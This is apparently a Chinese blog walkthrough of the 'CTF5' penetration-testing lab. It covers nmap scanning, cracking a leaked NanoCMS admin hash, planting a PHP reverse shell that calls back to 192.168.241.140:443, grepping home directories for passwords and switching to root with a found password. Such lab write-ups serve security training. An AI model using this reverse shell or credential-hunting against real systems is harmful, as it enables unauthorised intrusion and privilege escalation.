【学渗透靶机——CTF5】

文章描述了一次CTF竞赛中的信息收集过程,包括使用Nmap扫描主机IP和开放端口,发现SQL注入和远程代码执行漏洞。通过密码hash解密获取Nanocms后台登录凭据,写入反弹shell,然后尝试系统权限提升,最终成功获取root权限。
摘要由CSDN通过智能技术生成

信息收集

主机信息收集

主机ip

nmap -sn 192.168.241.0/24 

在这里插入图片描述

主机开放端口

root@kali:/root/baji_100/CTF5# nmap --min-rate 10000 -p- 192.168.241.153

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -O  -p22,25,80,110,139,143,445,901,3306,55439  192.168.241.153

在这里插入图片描述

主机漏洞探测

nmap --script=vuln -p22,25,80,110,111,129,143,445,901,3306,55439 192.168.241.153

在这里插入图片描述
总结,通过nmap 扫描主机咯东发现有几个路径存在sql 注入、和枚举
剩余没什么有用信息。 之后在测试

web 信息收集

访问80端口

在这里插入图片描述
通过浏览发现blog 使用的nanocms
在这里插入图片描述
通过搜索searchsploit ,存在远程代码执行,但是需要登录,我们目前没有账号密码
在这里插入图片描述
通过互联网搜索,发信有个密码hash 信息泄露的路径
在这里插入图片描述
访问该路径,果然存在,账号admin 密码 hash
在这里插入图片描述

在线解密 hash,密码为:shannon
在这里插入图片描述
使用账号密码登录后台成功,发现页面中可写,尝试写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'"); ?>

在这里插入图片描述

获取系统初始shell

通过监听443 获取系统初始shell

在这里插入图片描述
(1)查看当前账号有哪些超级权限,发现需要密码 ,尝试shannon 失败
在这里插入图片描述
(2)查看计划任务,没有有效的信息

在这里插入图片描述

(3)查看/etc/passwd, 及shadow ,发现pass好几个用户, shadow 无权限
在这里插入图片描述
(4)搜索pass 关键字信息
多账号下 搜索是否存在账号密码信息

grep -R -i pass /home/*  2>/dev/null  |grep -v jquery

在这里插入图片描述
查看该文件, 密码50$cent
在这里插入图片描述

提权

切换root登录 ,登录成功

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值